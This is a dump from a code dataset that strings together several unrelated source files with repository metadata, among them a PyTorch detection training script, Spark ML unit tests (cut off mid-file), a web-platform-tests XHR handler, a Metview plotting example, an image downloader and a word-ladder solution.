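        async for delta in socket.listen_market(['BTC-ETH', 'BTC-LTC']):
            print(delta['market_name'], len(delta.get('fills', [])))
    finally:
        await socket.close()


if __name__ == '__main__':
    asyncio.get_event_loop().run_until_complete(_example_watch_markets())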
| 31.22807
| 114
| 0.469757
|
404184341d793729c1f30de373a63520bf34025c
| 430
|
py
|
Python
|
test/test_login.py
|
IrinaSlobodchikova/marker
|
72f981134fb025a94348cd2bc829fa8430a01372
|
[
"Apache-2.0"
] | null | null | null |
test/test_login.py
|
IrinaSlobodchikova/marker
|
72f981134fb025a94348cd2bc829fa8430a01372
|
[
"Apache-2.0"
] | null | null | null |
test/test_login.py
|
IrinaSlobodchikova/marker
|
72f981134fb025a94348cd2bc829fa8430a01372
|
[
"Apache-2.0"
] | null | null | null |
#def test_marker_login(app):
# username = app.username
# password = app.password
# app.session.ensure_login_marker(username, password)
# user = app.session.get_logged_user_marker()
# assert username == user
def test_marker_login(app):
username = app.username
password = app.password
app.sessionSM.sm_login(username, password)
user = app.sessionSM.get_logged_user_sm()
assert username == user
| 26.875
| 56
| 0.718605
|
90bedf995290b70cdc1c1e8156090b8562036407
| 1,031
|
py
|
Python
|
xhr/resources/conditional.py
|
shs96c/web-platform-tests
|
61acad6dd9bb99d32340eb41f5146de64f542359
|
[
"BSD-3-Clause"
] | 4
|
2020-09-09T15:28:01.000Z
|
2021-12-01T00:59:56.000Z
|
xhr/resources/conditional.py
|
shs96c/web-platform-tests
|
61acad6dd9bb99d32340eb41f5146de64f542359
|
[
"BSD-3-Clause"
] | 1
|
2021-03-31T20:23:55.000Z
|
2021-03-31T20:23:55.000Z
|
xhr/resources/conditional.py
|
shs96c/web-platform-tests
|
61acad6dd9bb99d32340eb41f5146de64f542359
|
[
"BSD-3-Clause"
] | 1
|
2020-03-31T17:20:54.000Z
|
2020-03-31T17:20:54.000Z
|
def main(request, response):
tag = request.GET.first("tag", None)
match = request.headers.get("If-None-Match", None)
date = request.GET.first("date", "")
modified = request.headers.get("If-Modified-Since", None)
cors = request.GET.first("cors", None)
if request.method == "OPTIONS":
response.headers.set("Access-Control-Allow-Origin", "*")
response.headers.set("Access-Control-Allow-Headers", "IF-NONE-MATCH")
return ""
if tag:
response.headers.set("ETag", '"%s"' % tag)
elif date:
response.headers.set("Last-Modified", date)
if cors:
response.headers.set("Access-Control-Allow-Origin", "*")
if ((match is not None and match == tag) or
(modified is not None and modified == date)):
response.status = (304, "SUPERCOOL")
return ""
else:
if not cors:
response.headers.set("Access-Control-Allow-Origin", "*")
response.headers.set("Content-Type", "text/plain")
return "MAYBE NOT"
| 34.366667
| 77
| 0.604268
|
09bc6334718f8576d8c8fe62b7e0168b5f33bbe2
| 10,445
|
py
|
Python
|
references/detection/train.py
|
futurelife2016/vision
|
bbd9ff8fb936846aa0412996abab19b563677e5b
|
[
"BSD-3-Clause"
] | 1
|
2022-01-06T01:58:01.000Z
|
2022-01-06T01:58:01.000Z
|
references/detection/train.py
|
futurelife2016/vision
|
bbd9ff8fb936846aa0412996abab19b563677e5b
|
[
"BSD-3-Clause"
] | null | null | null |
references/detection/train.py
|
futurelife2016/vision
|
bbd9ff8fb936846aa0412996abab19b563677e5b
|
[
"BSD-3-Clause"
] | null | null | null |
r"""PyTorch Detection Training.
To run in a multi-gpu environment, use the distributed launcher::
python -m torch.distributed.launch --nproc_per_node=$NGPU --use_env \
train.py ... --world-size $NGPU
The default hyperparameters are tuned for training on 8 gpus and 2 images per gpu.
--lr 0.02 --batch-size 2 --world-size 8
If you use different number of gpus, the learning rate should be changed to 0.02/8*$NGPU.
On top of that, for training Faster/Mask R-CNN, the default hyperparameters are
--epochs 26 --lr-steps 16 22 --aspect-ratio-group-factor 3
Also, if you train Keypoint R-CNN, the default hyperparameters are
--epochs 46 --lr-steps 36 43 --aspect-ratio-group-factor 3
Because the number of images is smaller in the person keypoint subset of COCO,
the number of epochs should be adapted so that we have the same number of iterations.
"""
import datetime
import os
import time
import presets
import torch
import torch.utils.data
import torchvision
import torchvision.models.detection
import torchvision.models.detection.mask_rcnn
import utils
from coco_utils import get_coco, get_coco_kp
from engine import train_one_epoch, evaluate
from group_by_aspect_ratio import GroupedBatchSampler, create_aspect_ratio_groups
try:
from torchvision.prototype import models as PM
except ImportError:
PM = None
def get_dataset(name, image_set, transform, data_path):
paths = {"coco": (data_path, get_coco, 91), "coco_kp": (data_path, get_coco_kp, 2)}
p, ds_fn, num_classes = paths[name]
ds = ds_fn(p, image_set=image_set, transforms=transform)
return ds, num_classes
def get_transform(train, args):
if train:
return presets.DetectionPresetTrain(args.data_augmentation)
elif not args.weights:
return presets.DetectionPresetEval()
else:
fn = PM.detection.__dict__[args.model]
weights = PM._api.get_weight(fn, args.weights)
return weights.transforms()
def get_args_parser(add_help=True):
import argparse
parser = argparse.ArgumentParser(description="PyTorch Detection Training", add_help=add_help)
parser.add_argument("--data-path", default="/datasets01/COCO/022719/", type=str, help="dataset path")
parser.add_argument("--dataset", default="coco", type=str, help="dataset name")
parser.add_argument("--model", default="maskrcnn_resnet50_fpn", type=str, help="model name")
parser.add_argument("--device", default="cuda", type=str, help="device (Use cuda or cpu Default: cuda)")
parser.add_argument(
"-b", "--batch-size", default=2, type=int, help="images per gpu, the total batch size is $NGPU x batch_size"
)
parser.add_argument("--epochs", default=26, type=int, metavar="N", help="number of total epochs to run")
parser.add_argument(
"-j", "--workers", default=4, type=int, metavar="N", help="number of data loading workers (default: 4)"
)
parser.add_argument(
"--lr",
default=0.02,
type=float,
help="initial learning rate, 0.02 is the default value for training on 8 gpus and 2 images_per_gpu",
)
parser.add_argument("--momentum", default=0.9, type=float, metavar="M", help="momentum")
parser.add_argument(
"--wd",
"--weight-decay",
default=1e-4,
type=float,
metavar="W",
help="weight decay (default: 1e-4)",
dest="weight_decay",
)
parser.add_argument(
"--lr-scheduler", default="multisteplr", type=str, help="name of lr scheduler (default: multisteplr)"
)
parser.add_argument(
"--lr-step-size", default=8, type=int, help="decrease lr every step-size epochs (multisteplr scheduler only)"
)
parser.add_argument(
"--lr-steps",
default=[16, 22],
nargs="+",
type=int,
help="decrease lr every step-size epochs (multisteplr scheduler only)",
)
parser.add_argument(
"--lr-gamma", default=0.1, type=float, help="decrease lr by a factor of lr-gamma (multisteplr scheduler only)"
)
parser.add_argument("--print-freq", default=20, type=int, help="print frequency")
parser.add_argument("--output-dir", default=".", type=str, help="path to save outputs")
parser.add_argument("--resume", default="", type=str, help="path of checkpoint")
parser.add_argument("--start_epoch", default=0, type=int, help="start epoch")
parser.add_argument("--aspect-ratio-group-factor", default=3, type=int)
parser.add_argument("--rpn-score-thresh", default=None, type=float, help="rpn score threshold for faster-rcnn")
parser.add_argument(
"--trainable-backbone-layers", default=None, type=int, help="number of trainable layers of backbone"
)
parser.add_argument(
"--data-augmentation", default="hflip", type=str, help="data augmentation policy (default: hflip)"
)
parser.add_argument(
"--sync-bn",
dest="sync_bn",
help="Use sync batch norm",
action="store_true",
)
parser.add_argument(
"--test-only",
dest="test_only",
help="Only test the model",
action="store_true",
)
parser.add_argument(
"--pretrained",
dest="pretrained",
help="Use pre-trained models from the modelzoo",
action="store_true",
)
# distributed training parameters
parser.add_argument("--world-size", default=1, type=int, help="number of distributed processes")
parser.add_argument("--dist-url", default="env://", type=str, help="url used to set up distributed training")
# Prototype models only
parser.add_argument("--weights", default=None, type=str, help="the weights enum name to load")
return parser
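# Example invocation (single-GPU smoke test; the data path is a placeholder and any
# torchvision detection model name is accepted):
#   python train.py --data-path /path/to/coco --model fasterrcnn_resnet50_fpn \
#       --epochs 1 --batch-size 2 --lr 0.0025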
def main(args):
if args.weights and PM is None:
raise ImportError("The prototype module couldn't be found. Please install the latest torchvision nightly.")
if args.output_dir:
utils.mkdir(args.output_dir)
utils.init_distributed_mode(args)
print(args)
device = torch.device(args.device)
# Data loading code
print("Loading data")
dataset, num_classes = get_dataset(args.dataset, "train", get_transform(True, args), args.data_path)
dataset_test, _ = get_dataset(args.dataset, "val", get_transform(False, args), args.data_path)
print("Creating data loaders")
if args.distributed:
train_sampler = torch.utils.data.distributed.DistributedSampler(dataset)
test_sampler = torch.utils.data.distributed.DistributedSampler(dataset_test)
else:
train_sampler = torch.utils.data.RandomSampler(dataset)
test_sampler = torch.utils.data.SequentialSampler(dataset_test)
if args.aspect_ratio_group_factor >= 0:
group_ids = create_aspect_ratio_groups(dataset, k=args.aspect_ratio_group_factor)
train_batch_sampler = GroupedBatchSampler(train_sampler, group_ids, args.batch_size)
else:
train_batch_sampler = torch.utils.data.BatchSampler(train_sampler, args.batch_size, drop_last=True)
data_loader = torch.utils.data.DataLoader(
dataset, batch_sampler=train_batch_sampler, num_workers=args.workers, collate_fn=utils.collate_fn
)
data_loader_test = torch.utils.data.DataLoader(
dataset_test, batch_size=1, sampler=test_sampler, num_workers=args.workers, collate_fn=utils.collate_fn
)
print("Creating model")
kwargs = {"trainable_backbone_layers": args.trainable_backbone_layers}
if "rcnn" in args.model:
if args.rpn_score_thresh is not None:
kwargs["rpn_score_thresh"] = args.rpn_score_thresh
if not args.weights:
model = torchvision.models.detection.__dict__[args.model](
pretrained=args.pretrained, num_classes=num_classes, **kwargs
)
else:
model = PM.detection.__dict__[args.model](weights=args.weights, num_classes=num_classes, **kwargs)
model.to(device)
if args.distributed and args.sync_bn:
model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model)
model_without_ddp = model
if args.distributed:
model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.gpu])
model_without_ddp = model.module
params = [p for p in model.parameters() if p.requires_grad]
optimizer = torch.optim.SGD(params, lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)
args.lr_scheduler = args.lr_scheduler.lower()
if args.lr_scheduler == "multisteplr":
lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=args.lr_steps, gamma=args.lr_gamma)
elif args.lr_scheduler == "cosineannealinglr":
lr_scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=args.epochs)
else:
raise RuntimeError(
f"Invalid lr scheduler '{args.lr_scheduler}'. Only MultiStepLR and CosineAnnealingLR are supported."
)
if args.resume:
checkpoint = torch.load(args.resume, map_location="cpu")
model_without_ddp.load_state_dict(checkpoint["model"])
optimizer.load_state_dict(checkpoint["optimizer"])
lr_scheduler.load_state_dict(checkpoint["lr_scheduler"])
args.start_epoch = checkpoint["epoch"] + 1
if args.test_only:
evaluate(model, data_loader_test, device=device)
return
print("Start training")
start_time = time.time()
for epoch in range(args.start_epoch, args.epochs):
if args.distributed:
train_sampler.set_epoch(epoch)
train_one_epoch(model, optimizer, data_loader, device, epoch, args.print_freq)
lr_scheduler.step()
if args.output_dir:
checkpoint = {
"model": model_without_ddp.state_dict(),
"optimizer": optimizer.state_dict(),
"lr_scheduler": lr_scheduler.state_dict(),
"args": args,
"epoch": epoch,
}
utils.save_on_master(checkpoint, os.path.join(args.output_dir, f"model_{epoch}.pth"))
utils.save_on_master(checkpoint, os.path.join(args.output_dir, "checkpoint.pth"))
# evaluate after every epoch
evaluate(model, data_loader_test, device=device)
total_time = time.time() - start_time
total_time_str = str(datetime.timedelta(seconds=int(total_time)))
print(f"Training time {total_time_str}")
if __name__ == "__main__":
args = get_args_parser().parse_args()
main(args)
| 39.866412
| 118
| 0.688368
|
3519c9b5687d86196b96625d707333e1ce2cf060
| 3,207
|
py
|
Python
|
docs/gallery/legend3.py
|
ecmwf/metview-docs
|
cfde15232834c2d2a8393e7e6ba67ba95acd51e0
|
[
"Apache-2.0"
] | 2
|
2021-07-19T09:02:33.000Z
|
2021-09-01T14:29:50.000Z
|
docs/gallery/legend3.py
|
ecmwf/metview-docs
|
cfde15232834c2d2a8393e7e6ba67ba95acd51e0
|
[
"Apache-2.0"
] | 1
|
2021-10-14T11:53:08.000Z
|
2021-12-01T10:07:34.000Z
|
docs/gallery/legend3.py
|
ecmwf/metview-docs
|
cfde15232834c2d2a8393e7e6ba67ba95acd51e0
|
[
"Apache-2.0"
] | null | null | null |
"""
GRIB - Histogram Legend
"""
# (C) Copyright 2017- ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
#
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation
# nor does it submit to any jurisdiction.
#
# ------------------------------------------------------------------
# Demonstrates how to combine two fields into a single plot
# using contour and shade. A histogram legend is used for one
# of the fields.
# ------------------------------------------------------------------
import metview as mv
# read the input grib temperature
filename = "t850.grb"
if mv.exist(filename):
my_data1 = mv.read(filename)
else:
my_data1 = mv.gallery.load_dataset(filename)
# read the input grib geopotential
filename = "z500.grb"
if mv.exist(filename):
my_data2 = mv.read(filename)
else:
my_data2 = mv.gallery.load_dataset(filename)
# set up the geographical view
my_view = mv.geoview(
map_area_definition="CORNERS",
map_projection="POLAR_STEREOGRAPHIC",
area=[21.51, -37.27, 51.28, 65.00],
)
# set up a shade contour with legend for the temperature field
my_contour1 = mv.mcont(
contour_level_selection_type="LEVEL_LIST",
contour_level_list=[-10.0, -8.0, -6.0, -4.0, -2.0, 0.0, 2.0, 4.0, 6.0, 8.0, 10.0],
contour="OFF",
contour_label="OFF",
contour_hilo="OFF",
legend="ON",
contour_shade="ON",
contour_shade_method="AREA_FILL",
contour_shade_colour_direction="CLOCKWISE",
contour_shade_max_level_colour="RED",
contour_shade_min_level_colour="BLUE",
)
# set up a black contour line for the geopotential field
my_contour2 = mv.mcont(
contour_level_selection_type="INTERVAL",
contour_line_colour="BLACK",
contour_line_thickness=1,
contour_hilo_height=0.25,
contour_interval=5.00,
contour_hilo="ON",
contour_hilo_quality="HIGH",
contour_highlight_colour="BLACK",
contour_highlight_thickness=2,
contour_label="OFF",
legend="OFF",
)
# set up the coastlines
my_coast = mv.mcoast(
map_coastline_resolution="HIGH",
map_grid_colour="CHARCOAL",
map_grid="ON",
map_coastline_colour="CHARCOAL",
)
# set up the title
my_title = mv.mtext(
text_font_size=0.60,
text_lines=["Positional and histogram legend", "", "", "", "", "", ""],
text_justification="LEFT",
text_colour="CHARCOAL",
)
# set up an histogram legend for the temperature field
my_legend = mv.mlegend(
legend_box_mode="POSITIONAL",
legend_box_x_position=1.00,
legend_box_x_length=27.00,
legend_box_y_position=16.00,
legend_box_y_length=3.00,
legend_display_type="HISTOGRAM",
legend_histogram_max_value="ON",
legend_label_frequency=1,
legend_text_font_size=0.40,
legend_text_colour="BLACK",
legend_title="ON",
legend_title_text="Temperature at 850 hPa",
)
# define the output plot file
mv.setoutput(mv.pdf_output(output_name="legend3"))
# plot the map
mv.plot(
my_view, my_data1, my_contour1, my_data2, my_contour2, my_coast, my_title, my_legend
)
| 28.131579
| 88
| 0.688494
|
2bc392b583d6de2219c23b663efe981122f68738
| 1,880
|
py
|
Python
|
helpers/file_saver.py
|
jameslafa/500px-fav-downloader
|
08a6bd46fc45aefed4630d0bffea8d410162f273
|
[
"MIT"
] | 1
|
2016-02-08T22:13:37.000Z
|
2016-02-08T22:13:37.000Z
|
helpers/file_saver.py
|
jameslafa/500px-fav-downloader
|
08a6bd46fc45aefed4630d0bffea8d410162f273
|
[
"MIT"
] | null | null | null |
helpers/file_saver.py
|
jameslafa/500px-fav-downloader
|
08a6bd46fc45aefed4630d0bffea8d410162f273
|
[
"MIT"
] | null | null | null |
import os
import requests
class FileSaver:
"""
Save a file to different storages
"""
# For the moment we only support disk, dropbox will come soon
SUPPORTED_STORAGE_TYPES = ['disk']
def __init__(self, storage_type, disk_storage_path=None):
"""
Build a FileSaver instance
:param storage_type: disk is the only available value for the moment
:param disk_storage_path: directory path where files will be saved
"""
# Validate the storage_type is supported
if storage_type not in self.SUPPORTED_STORAGE_TYPES:
raise AttributeError(str(storage_type) + ' is not a supported storage_type')
self.storage_type = storage_type
self.disk_storage_path = disk_storage_path
def save_image_from_url(self, url, photo_id):
"""
Download an image from an url and save it
:param url: url of the image to download
:param photo_id: id of the picture, used for the file name
:return:
"""
# Download file from url
r = requests.get(url, stream=True)
# If the response is OK
if r.status_code == 200:
if self.storage_type == 'disk':
                # Create the directory on the disk if it doesn't exist
if not os.path.isdir(self.disk_storage_path):
os.mkdir(self.disk_storage_path)
# Define file_path where the file will be stored
# TODO: extension shouldn't be hardcoded
file_path = os.path.join(self.disk_storage_path, str(photo_id) + '.jpg')
# Save image on the disk
with open(file_path, 'wb') as f:
for chunk in r.iter_content(1024):
f.write(chunk)
else:
raise RuntimeError("Couldn't download the image")
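# Usage sketch (not part of the original module): the URL and target directory below
# are hypothetical placeholders.
if __name__ == '__main__':
    saver = FileSaver('disk', disk_storage_path='./downloads')
    saver.save_image_from_url('https://example.com/photo.jpg', photo_id=12345)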
| 32.413793
| 88
| 0.604255
|
9f436b2e5272a9d4785046874eae26fcb7f688dc
| 1,239
|
py
|
Python
|
LeetCodeSolutions/python/127_Word_Ladder.py
|
ChuanleiGuo/AlgorithmsPlayground
|
90b6287b742c8bfd3797540c408d679be2821a40
|
[
"MIT"
] | 1
|
2017-03-27T13:38:37.000Z
|
2017-03-27T13:38:37.000Z
|
LeetCodeSolutions/python/127_Word_Ladder.py
|
ChuanleiGuo/AlgorithmsPlayground
|
90b6287b742c8bfd3797540c408d679be2821a40
|
[
"MIT"
] | null | null | null |
LeetCodeSolutions/python/127_Word_Ladder.py
|
ChuanleiGuo/AlgorithmsPlayground
|
90b6287b742c8bfd3797540c408d679be2821a40
|
[
"MIT"
] | null | null | null |
import string
from collections import deque
class Solution(object):
def ladderLength(self, beginWord, endWord, wordList):
"""
:type beginWord: str
:type endWord: str
:type wordList: Set[str]
:rtype: int
"""
word_list = set(wordList)
if beginWord in word_list:
word_list.remove(beginWord)
word_list.add(endWord)
        letters = string.ascii_lowercase
        queue = deque([beginWord])
level = 0
while len(queue) != 0:
size = len(queue)
while size > 0:
size -= 1
                word = queue.popleft()
if word == endWord:
return level + 1
chars = list(word)
for i in range(len(word)):
for letter in letters:
if letter != word[i]:
chars[i] = letter
new_word = "".join(chars)
if new_word in word_list:
word_list.remove(new_word)
queue.append(new_word)
chars[i] = word[i]
level += 1
return 0
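# Usage sketch (not part of the original solution): a tiny hand-made word list.
if __name__ == "__main__":
    words = {"hot", "dot", "dog", "lot", "log", "cog"}
    print(Solution().ladderLength("hit", "cog", words))  # expected shortest ladder length: 5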
| 26.361702
| 58
| 0.436642
|
918edb56a95aa7badf30c97e83c11dfff6a26eeb
| 49
|
py
|
Python
|
tests/General/Varnametest.py
|
soodsidd/instpyr
|
138d0a8164dc388187fde58329b9ff770af77af4
|
[
"MIT"
] | null | null | null |
tests/General/Varnametest.py
|
soodsidd/instpyr
|
138d0a8164dc388187fde58329b9ff770af77af4
|
[
"MIT"
] | null | null | null |
tests/General/Varnametest.py
|
soodsidd/instpyr
|
138d0a8164dc388187fde58329b9ff770af77af4
|
[
"MIT"
] | null | null | null |
from varname import nameof  # third-party 'varname' package (assumed dependency) provides nameof()

a = 1
print(nameof(a))
print(eval('a+5'))
print(a)
| 9.8
| 18
| 0.632653
|
f19ce2de858d7815208f1d4ae67ad65602e0d979
| 436
|
py
|
Python
|
microcosm_sagemaker/tests/app_hooks/evaluate/config.py
|
globality-corp/microcosm-sagemaker
|
c112ea2c1f5c40c1973c292b73ca0fadbf461280
|
[
"Apache-2.0"
] | null | null | null |
microcosm_sagemaker/tests/app_hooks/evaluate/config.py
|
globality-corp/microcosm-sagemaker
|
c112ea2c1f5c40c1973c292b73ca0fadbf461280
|
[
"Apache-2.0"
] | 15
|
2019-04-22T19:46:32.000Z
|
2022-02-11T17:31:43.000Z
|
microcosm_sagemaker/tests/app_hooks/evaluate/config.py
|
globality-corp/microcosm-sagemaker
|
c112ea2c1f5c40c1973c292b73ca0fadbf461280
|
[
"Apache-2.0"
] | null | null | null |
"""
Configure the application.
"""
from microcosm.config.model import Configuration
from microcosm.metadata import Metadata
def load_default_config(metadata: Metadata) -> Configuration:
"""
Construct application default configuration.
There should be very little here.
"""
config = Configuration(
active_bundle="compound_bundle",
active_evaluation="simple_evaluation",
)
return config
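# Usage sketch (not part of the original module): "example_app" is a hypothetical
# service name used only for illustration.
if __name__ == "__main__":
    example_config = load_default_config(Metadata("example_app"))
    print(example_config.active_bundle, example_config.active_evaluation)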
| 18.956522
| 61
| 0.715596
|
a7a9868baccb301c588101e1d710e18a8985aeae
| 37,245
|
py
|
Python
|
python/pyspark/ml/tests.py
|
ruby-/spark-parent_2.11
|
5f5e9583f705bcdbf73321e14e02b539dc3f08b1
|
[
"BSD-3-Clause-Open-MPI",
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause-Clear",
"BSD-3-Clause"
] | null | null | null |
python/pyspark/ml/tests.py
|
ruby-/spark-parent_2.11
|
5f5e9583f705bcdbf73321e14e02b539dc3f08b1
|
[
"BSD-3-Clause-Open-MPI",
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause-Clear",
"BSD-3-Clause"
] | null | null | null |
python/pyspark/ml/tests.py
|
ruby-/spark-parent_2.11
|
5f5e9583f705bcdbf73321e14e02b539dc3f08b1
|
[
"BSD-3-Clause-Open-MPI",
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause-Clear",
"BSD-3-Clause"
] | null | null | null |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Unit tests for Spark ML Python APIs.
"""
import array
import sys
if sys.version > '3':
xrange = range
basestring = str
try:
import xmlrunner
except ImportError:
xmlrunner = None
if sys.version_info[:2] <= (2, 6):
try:
import unittest2 as unittest
except ImportError:
sys.stderr.write('Please install unittest2 to test with Python 2.6 or earlier')
sys.exit(1)
else:
import unittest
from shutil import rmtree
import tempfile
import numpy as np
from pyspark.ml import Estimator, Model, Pipeline, PipelineModel, Transformer
from pyspark.ml.classification import LogisticRegression, DecisionTreeClassifier, OneVsRest
from pyspark.ml.clustering import KMeans
from pyspark.ml.evaluation import BinaryClassificationEvaluator, RegressionEvaluator
from pyspark.ml.feature import *
from pyspark.ml.param import Param, Params, TypeConverters
from pyspark.ml.param.shared import HasMaxIter, HasInputCol, HasSeed
from pyspark.ml.regression import LinearRegression, DecisionTreeRegressor
from pyspark.ml.tuning import *
from pyspark.ml.util import keyword_only
from pyspark.ml.util import MLWritable, MLWriter
from pyspark.ml.wrapper import JavaParams
from pyspark.mllib.linalg import Vectors, DenseVector, SparseVector
from pyspark.sql import DataFrame, SQLContext, Row
from pyspark.sql.functions import rand
from pyspark.tests import ReusedPySparkTestCase as PySparkTestCase
class MockDataset(DataFrame):
def __init__(self):
self.index = 0
class HasFake(Params):
def __init__(self):
super(HasFake, self).__init__()
self.fake = Param(self, "fake", "fake param")
def getFake(self):
return self.getOrDefault(self.fake)
class MockTransformer(Transformer, HasFake):
def __init__(self):
super(MockTransformer, self).__init__()
self.dataset_index = None
def _transform(self, dataset):
self.dataset_index = dataset.index
dataset.index += 1
return dataset
class MockEstimator(Estimator, HasFake):
def __init__(self):
super(MockEstimator, self).__init__()
self.dataset_index = None
def _fit(self, dataset):
self.dataset_index = dataset.index
model = MockModel()
self._copyValues(model)
return model
class MockModel(MockTransformer, Model, HasFake):
pass
class ParamTypeConversionTests(PySparkTestCase):
"""
Test that param type conversion happens.
"""
def test_int(self):
lr = LogisticRegression(maxIter=5.0)
self.assertEqual(lr.getMaxIter(), 5)
self.assertTrue(type(lr.getMaxIter()) == int)
self.assertRaises(TypeError, lambda: LogisticRegression(maxIter="notAnInt"))
self.assertRaises(TypeError, lambda: LogisticRegression(maxIter=5.1))
def test_float(self):
lr = LogisticRegression(tol=1)
self.assertEqual(lr.getTol(), 1.0)
self.assertTrue(type(lr.getTol()) == float)
self.assertRaises(TypeError, lambda: LogisticRegression(tol="notAFloat"))
def test_vector(self):
ewp = ElementwiseProduct(scalingVec=[1, 3])
self.assertEqual(ewp.getScalingVec(), DenseVector([1.0, 3.0]))
ewp = ElementwiseProduct(scalingVec=np.array([1.2, 3.4]))
self.assertEqual(ewp.getScalingVec(), DenseVector([1.2, 3.4]))
self.assertRaises(TypeError, lambda: ElementwiseProduct(scalingVec=["a", "b"]))
def test_list(self):
l = [0, 1]
for lst_like in [l, np.array(l), DenseVector(l), SparseVector(len(l), range(len(l)), l),
array.array('l', l), xrange(2), tuple(l)]:
converted = TypeConverters.toList(lst_like)
self.assertEqual(type(converted), list)
self.assertListEqual(converted, l)
def test_list_int(self):
for indices in [[1.0, 2.0], np.array([1.0, 2.0]), DenseVector([1.0, 2.0]),
SparseVector(2, {0: 1.0, 1: 2.0}), xrange(1, 3), (1.0, 2.0),
array.array('d', [1.0, 2.0])]:
vs = VectorSlicer(indices=indices)
self.assertListEqual(vs.getIndices(), [1, 2])
self.assertTrue(all([type(v) == int for v in vs.getIndices()]))
self.assertRaises(TypeError, lambda: VectorSlicer(indices=["a", "b"]))
def test_list_float(self):
b = Bucketizer(splits=[1, 4])
self.assertEqual(b.getSplits(), [1.0, 4.0])
self.assertTrue(all([type(v) == float for v in b.getSplits()]))
self.assertRaises(TypeError, lambda: Bucketizer(splits=["a", 1.0]))
def test_list_string(self):
for labels in [np.array(['a', u'b']), ['a', u'b'], np.array(['a', 'b'])]:
idx_to_string = IndexToString(labels=labels)
self.assertListEqual(idx_to_string.getLabels(), ['a', 'b'])
self.assertRaises(TypeError, lambda: IndexToString(labels=['a', 2]))
def test_string(self):
lr = LogisticRegression()
for col in ['features', u'features', np.str_('features')]:
lr.setFeaturesCol(col)
self.assertEqual(lr.getFeaturesCol(), 'features')
self.assertRaises(TypeError, lambda: LogisticRegression(featuresCol=2.3))
def test_bool(self):
self.assertRaises(TypeError, lambda: LogisticRegression(fitIntercept=1))
self.assertRaises(TypeError, lambda: LogisticRegression(fitIntercept="false"))
class PipelineTests(PySparkTestCase):
def test_pipeline(self):
dataset = MockDataset()
estimator0 = MockEstimator()
transformer1 = MockTransformer()
estimator2 = MockEstimator()
transformer3 = MockTransformer()
pipeline = Pipeline(stages=[estimator0, transformer1, estimator2, transformer3])
pipeline_model = pipeline.fit(dataset, {estimator0.fake: 0, transformer1.fake: 1})
model0, transformer1, model2, transformer3 = pipeline_model.stages
self.assertEqual(0, model0.dataset_index)
self.assertEqual(0, model0.getFake())
self.assertEqual(1, transformer1.dataset_index)
self.assertEqual(1, transformer1.getFake())
self.assertEqual(2, dataset.index)
self.assertIsNone(model2.dataset_index, "The last model shouldn't be called in fit.")
self.assertIsNone(transformer3.dataset_index,
"The last transformer shouldn't be called in fit.")
dataset = pipeline_model.transform(dataset)
self.assertEqual(2, model0.dataset_index)
self.assertEqual(3, transformer1.dataset_index)
self.assertEqual(4, model2.dataset_index)
self.assertEqual(5, transformer3.dataset_index)
self.assertEqual(6, dataset.index)
class TestParams(HasMaxIter, HasInputCol, HasSeed):
"""
A subclass of Params mixed with HasMaxIter, HasInputCol and HasSeed.
"""
@keyword_only
def __init__(self, seed=None):
super(TestParams, self).__init__()
self._setDefault(maxIter=10)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, seed=None):
"""
setParams(self, seed=None)
Sets params for this test.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
class OtherTestParams(HasMaxIter, HasInputCol, HasSeed):
"""
A subclass of Params mixed with HasMaxIter, HasInputCol and HasSeed.
"""
@keyword_only
def __init__(self, seed=None):
super(OtherTestParams, self).__init__()
self._setDefault(maxIter=10)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, seed=None):
"""
setParams(self, seed=None)
Sets params for this test.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
class HasThrowableProperty(Params):
def __init__(self):
super(HasThrowableProperty, self).__init__()
self.p = Param(self, "none", "empty param")
@property
def test_property(self):
raise RuntimeError("Test property to raise error when invoked")
class ParamTests(PySparkTestCase):
def test_copy_new_parent(self):
testParams = TestParams()
# Copying an instantiated param should fail
with self.assertRaises(ValueError):
testParams.maxIter._copy_new_parent(testParams)
# Copying a dummy param should succeed
TestParams.maxIter._copy_new_parent(testParams)
maxIter = testParams.maxIter
self.assertEqual(maxIter.name, "maxIter")
self.assertEqual(maxIter.doc, "max number of iterations (>= 0).")
self.assertTrue(maxIter.parent == testParams.uid)
def test_param(self):
testParams = TestParams()
maxIter = testParams.maxIter
self.assertEqual(maxIter.name, "maxIter")
self.assertEqual(maxIter.doc, "max number of iterations (>= 0).")
self.assertTrue(maxIter.parent == testParams.uid)
def test_hasparam(self):
testParams = TestParams()
self.assertTrue(all([testParams.hasParam(p.name) for p in testParams.params]))
self.assertFalse(testParams.hasParam("notAParameter"))
def test_params(self):
testParams = TestParams()
maxIter = testParams.maxIter
inputCol = testParams.inputCol
seed = testParams.seed
params = testParams.params
self.assertEqual(params, [inputCol, maxIter, seed])
self.assertTrue(testParams.hasParam(maxIter.name))
self.assertTrue(testParams.hasDefault(maxIter))
self.assertFalse(testParams.isSet(maxIter))
